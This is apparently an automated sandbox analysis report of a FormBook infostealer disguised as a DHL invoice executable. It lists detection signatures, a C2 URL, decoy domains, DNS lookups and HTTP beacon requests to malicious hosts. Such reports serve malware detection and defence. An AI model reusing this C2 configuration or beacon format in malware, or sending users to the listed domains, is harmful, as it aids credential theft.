Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample name: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Analysis ID: 1482411
MD5: 5ec011058b0884bc3b13563f97231c58
SHA1: 9846a460d630ea60c476df6dc92ae10d902bb54f
SHA256: bc5a7642799c2f22d513dc19fb87848ecbe002f1815b2d5fd3a5af3fdbcdf0ae

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}
Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Joe Sandbox ML: detected
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\explorer.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_0127C2A2 FindFirstFileExW, 0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B68EE FindFirstFileW,FindClose, 0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose, 4_2_0035F0D3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then sub dword ptr [esp+04h], 0Ch 4_2_00355AD1

Networking

Source: C:\Windows\explorer.exe Network Connect: 192.185.209.182 80
Source: C:\Windows\explorer.exe Network Connect: 65.21.196.90 80
Source: C:\Windows\explorer.exe Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe Network Connect: 84.32.84.32 80
Source: C:\Windows\explorer.exe Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe Network Connect: 162.241.203.16 80
Source: C:\Windows\explorer.exe Domain query: www.ilovetvs.com
Source: Malware configuration extractor URLs: www.crucka.xyz/jd21/
Source: C:\Windows\explorer.exe DNS query: www.00050591.xyz
Source: C:\Windows\explorer.exe DNS query: www.kjsdhklssk73.xyz
Source: DNS query: www.uhug.xyz
Source: DNS query: www.crucka.xyz
Source: global traffic HTTP traffic detected: GET /jd21/?tBZLfTtx=28cPGcaENb280W65HmbHU6pQLIPuemsbyE+toeghGUICUOM9gHK+zZW7s47qkPel79A7Dw==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.thepowerofzeus.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jd21/?tBZLfTtx=LcHXUWoW2sdPa4UFpuGqq/go6wrzpC/UeDgbPZxccUPKb44TjfXPeWdmbH3xVj13RIFx0w==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.alivioquantico.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jd21/?tBZLfTtx=+5nsDbzeImt5UbX4GDv04YNxDKhKydlr4q6vzHl7qi3uGOgXSU0vDET8vanb4niZtoheVA==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.00050591.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jd21/?tBZLfTtx=4y1ij/qZRR1bNd/L/F5yLi+I0SkPKWffZZi+nDy9y9Wv5I2iqoZUG1btNWEB8myok8jbUg==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.arthemis-168bet.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jd21/?tBZLfTtx=Bo1mqRoziIz4wcXV2Hze6fEKc1jUulyNDnBrZ1tCE4J7kcYVEj/nayXnveqqwa6JZwq74w==&oHEpRr=M2JpdRJ HTTP/1.1 Host: www.ilovetvs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 185.107.56.60
Source: Joe Sandbox View IP Address: 84.32.84.32
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: CP-ASDE
Source: Joe Sandbox View ASN Name: NFORCENL
Source: Joe Sandbox View ASN Name: OIS1US
Source: Joe Sandbox View ASN Name: NTT-LT-ASLT
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012BCF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent, 0_2_012BCF1A
Source: global traffic DNS traffic detected: DNS query: www.thepowerofzeus.com
Source: global traffic DNS traffic detected: DNS query: www.alivioquantico.com
Source: global traffic DNS traffic detected: DNS query: www.00050591.xyz
Source: global traffic DNS traffic detected: DNS query: www.kjsdhklssk73.xyz
Source: global traffic DNS traffic detected: DNS query: www.arthemis-168bet.site
Source: global traffic DNS traffic detected: DNS query: www.ilovetvs.com
Source: global traffic DNS traffic detected: DNS query: www.bougeefilth.com
Source: global traffic DNS traffic detected: DNS query: www.uhug.xyz
Source: global traffic DNS traffic detected: DNS query: www.crucka.xyz
Source: global traffic DNS traffic detected: DNS query: www.freyja.info
Source: global traffic DNS traffic detected: DNS query: www.batremake.com
Source: global traffic DNS traffic detected: DNS query: www.gbqspj.club
Source: global traffic DNS traffic detected: DNS query: www.mantapnagita777.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 25 Jul 2024 19:36:32 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000003.00000002.869745021.0000000008CFF000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.0000000002D9F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://thebatcompany.fr/jd21?tBZLfTtx=GfbF6txqq2gI5hQXVs74X
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.00050591.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.00050591.xyz/jd21/www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.00050591.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.alivioquantico.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.alivioquantico.com/jd21/www.00050591.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.alivioquantico.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amsya.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.amsya.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arthemis-168bet.site/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arthemis-168bet.site/jd21/www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arthemis-168bet.siteReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.batremake.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.batremake.com/jd21/www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.batremake.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bougeefilth.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bougeefilth.com/jd21/www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bougeefilth.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.crucka.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.crucka.xyz/jd21/www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.crucka.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.freyja.info/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.freyja.info/jd21/www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.freyja.infoReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gbqspj.club/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gbqspj.club/jd21/www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.gbqspj.clubReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilovetvs.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilovetvs.com/jd21/www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilovetvs.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kapten69pola.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kapten69pola.xyz/jd21/www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kapten69pola.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kjsdhklssk73.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mantapnagita777.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mantapnagita777.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
